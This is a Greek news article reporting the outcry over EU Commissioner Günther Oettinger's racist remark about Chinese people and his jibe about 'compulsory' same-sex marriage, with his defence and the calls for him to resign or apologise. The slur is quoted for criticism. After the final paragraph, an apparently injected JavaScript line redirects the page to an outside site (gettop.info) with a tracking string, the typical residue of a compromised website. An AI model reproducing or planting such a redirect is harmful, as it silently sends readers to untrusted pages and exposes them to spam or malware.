Σάλος για ομοφοβικές και ρατσιστικές δηλώσεις Έτινγκερ: Σχιστομάτηδες οι Κινέζοι

0
9

 

Σάλος ξέσπασε στη Γερμανία έπειτα από ρατσιστικές αλλά και ομοφοβικές δηλώσεις που έκανε ο Επίτροπος Ψηφιακής Οικονομίας Γκίντερ Έτινγκερ.

Σε επιχειρηματική συνάντηση στο Αμβούργο, ο κ. Έτινγκερ χαρακτήρισε τους Κινέζους και γενικότερα τους Ασιάτες «σχιστομάτηδες» ενώ επιπλέον έκανε λόγο για γάμο ομοφυλοφίλων που σύντομα πρόκειται να «επιβληθεί» στη Γερμανία.

Ο ίδιος μιλώντας στην εφημερίδα Die Welt είπε ότι οι δηλώσεις απομονώθηκαν από όλα όσα είπε. «Στην ομιλία μου ήθελα να προειδοποιήσω τη Γερμανία για τυχόν κινδύνους από την υπερβολική της αυτοπεποίθηση στους τομείς της ψηφιακής οικονομίας ενώ υπολείπεται ασιατικών χωρών, από τις οποίες θα πρέπει να παραδειγματιστεί», ανέφερε στη εφημερίδα.

Όπως τόνισε στη συνέντευξή του, η αναφορά του στους ανθρώπους ασιατικής καταγωγής ήταν μάλλον απρόσεκτη, αλλά δεν ζήτησε συγγνώμη για τον χαρακτηρισμό.

Σε άλλο μέρος της ομιλίας του, ο Επίτροπος αναφέρεται ειρωνικά στις προτεραιότητες της γερμανικής πολιτικής – όπως οι άδειες μητρότητας – και καταλήγει μεταξύ αστείου και σοβαρού ότι ίσως στο μέλλον θα νομοθετηθούν «υποχρεωτικοί γάμοι ομοφυλοφίλων».

Ο κ. Έτινγκερ είπε στη γερμανική εφημερίδα πως δεν έχει κάτι εναντίον των γάμων των ομοφυλόφιλων κι ότι απλώς ήθελε να σχολιάσει ότι στη γερμανική ατζέντα υπάρχουν μικρή σημασίας θέματα ενώ απουσιάζει το κρίσιμο ζήτημα της ανταγωνιστικότητας.

Οι δηλώσεις του ωστόσο προκάλεσαν όπως ήταν αναμενόμενο σάλο. Η γγ των Σοσιαλδημοκρατών άφησε να εννοηθεί ότι ο κ. Έτινγκερ θα πρέπει να παραιτηθεί από τη θέση του, τονίζοντας ότι όποιος μιλά με τέτοιες προκαταλήψεις αποκλείει τον εαυτό του από υψηλά πολιτικά αξιώματα, όπως είπε στο Spiegel.

Η Γερμανική Ένωση Γκέι και Λεσβιών κάλεσε τον κ. Έτινγκερ να απολογηθεί, τονίζοντας πως ο κάθε Επίτροπος πρέπει να αντιπροσωπεύει πειστικά τις ευρωπαϊκές αξίες κατά των διακρίσεων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here